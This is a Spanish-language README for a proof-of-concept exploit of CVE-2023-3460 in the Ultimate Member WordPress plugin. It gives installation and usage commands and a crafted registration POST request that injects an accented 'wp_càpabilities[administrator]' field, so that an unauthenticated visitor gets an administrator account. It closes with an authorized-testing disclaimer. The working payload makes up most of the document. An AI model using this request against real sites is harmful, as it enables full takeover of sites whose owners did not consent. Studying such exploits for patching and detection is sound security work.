
Exploit de prueba de concepto para CVE-2023-3460, una vulnerabilidad de escalada de privilegios en Ultimate Member de WordPress. Crea una cuenta de administrador mediante una solicitud de registro manipulada. Solo para pruebas autorizadas.
Este es un exploit de prueba de concepto (PoC) para CVE-2023-3460, una vulnerabilidad crítica en el plugin de WordPress Ultimate Member. Permite a usuarios no autenticados escalar sus privilegios a Administrador mediante una solicitud de registro maliciosa.
🔥 Impacto: Compromiso total del sitio mediante la creación no autorizada de cuentas de administrador.
requestsurllib3beautifulsoup4Instala los requisitos:
pip3 install requests urllib3 beautifulsoup4
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD>
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123
_wpnonce) de la página de registrowp_capabilities con el rol administratorPOST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded
user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>
Este script se proporciona solo con fines educativos y de pruebas autorizadas. La explotación no autorizada de sistemas es ilegal y poco ética. Úsalo únicamente en sistemas que poseas o para los que tengas permiso de prueba.